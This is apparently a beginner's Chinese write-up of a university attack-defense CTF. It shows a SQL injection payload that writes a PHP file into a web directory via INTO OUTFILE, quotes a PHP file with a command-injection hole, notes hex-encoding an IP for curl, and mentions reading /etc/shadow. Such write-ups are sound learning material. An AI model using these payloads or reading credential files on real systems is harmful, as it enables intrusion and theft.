第二届郑州高校网络技能大赛wp

第一次参加awd攻防赛,和其他高校的大佬一起比赛,感觉到自己好菜呜呜~

规则就是要找出网站的漏洞,然后修复并且去攻击别人,攻击就是利用漏洞,然后拿到shell,执行一句话后就可以拿到flag

记录一下自己明白的漏洞…

靶机2018

into outfile

看到新闻上的

/index.php?action=view&mod=detail&id=5' 

时,就想着用sqlmap跑,跑出来flag了,但是一试其他队伍的,发现跑出来的flag都他喵一模一样;后来知道,可以使用into outfile将一句话木马写入文件

/index.php?action=view&mod=detail&id=5 union select 1,
'<?php phpinfo();?>',1,1,1,1,1 
from z_users limit 1 into outfile '/var/www/html/images/1.php' 

php的16进制绕过

有一个文件:

<?php
if(!isset($_GET['c'])){
    exit();
}else{
    $c = $_GET['c'];
    if(!preg_match('/^\w+$/', $c)){
        exit('hi!gemen!');
    }else{
        $str = 'clur';
        $rand = str_shuffle($str);
        echo `$rand . ' ' . $c`;        
    }
}
?>

之后百度找正则匹配方面的漏洞,发现搜到的东西错误的地方真是太多。。。

表达式的格式: "/表达式/[修正符]" 

$表示行结尾,^表示行开始

\w 匹配英文字母、数字或下划线

str_shuffle(): 将字符随机打乱,当打乱成curl时即可执行语句拿到flag

由于需要利用curl请求内部flag服务器10.0.1.2,则需使用ip的16进制进行请求获得flag。

金融JSP

Linux中,所有用户的账号和密码都可以在/etc/passwd和/etc/shadow这两个文件中找到

通过:

vi /etc/shadow

查看,格式:

登录名:加密口令:最后一次修改时间:最小时间间隔:最大时间间隔:警告时间:不活动时间:失效时间:标志